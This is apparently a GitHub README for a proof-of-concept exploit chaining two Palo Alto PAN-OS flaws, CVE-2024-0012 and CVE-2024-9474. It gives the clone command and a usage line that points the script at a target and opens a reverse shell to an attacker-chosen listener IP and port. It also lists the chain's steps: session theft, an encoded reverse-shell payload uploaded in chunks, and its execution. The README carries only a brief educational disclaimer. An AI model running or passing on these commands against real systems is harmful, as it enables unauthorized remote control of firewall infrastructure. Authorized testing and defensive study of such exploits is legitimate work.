This Proof-of-Concept (PoC) script targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474 by automating the exploitation process, including autentication bypass, payload creation, chunked delivery, and seamless command execution.
⚠️ This script is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.
- Type: Authentication Bypass
- Impact: Enables unauthorized access to administrative interfaces.
- Severity: 🚨 Critical
- Type: Command Execution & Privilege Escalation
- Impact: Allows remote attackers to execute arbitrary commands.
- Severity: 🔥 Medium
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoCpython -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT><TARGET_URL>: The target URL, includinghttporhttps.<LISTENER_IP>: Your IP address for the reverse shell listener.<LISTENER_PORT>: The port for the reverse shell listener.
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444Screen.Recording.2024-12-12.at.12.03.59.AM.mov
Get the full breakdown and technical insights into this PoC from this Medium Write-up!
- 🔍 Checks Vulnerability: Ensures the target is vulnerable to CVE-2024-0012 and CVE-2024-9474.
- 🛡️ Extracts PHPSESSID: Retrieves a session ID for further exploitation.
- ✨ Generates Payload: Creates a double-encoded reverse shell payload.
- 📦 Uploads Chunks: Sends payload chunks to the target server.
- 🔗 Combines Payload: Reconstructs the payload on the target system.
- ⚡ Executes Command: Decodes and executes the reverse shell.
This PoC is intended for educational purposes and authorized security testing only. Unauthorized use of this tool is strictly prohibited. The authors are not responsible for any misuse or damage caused by this tool.
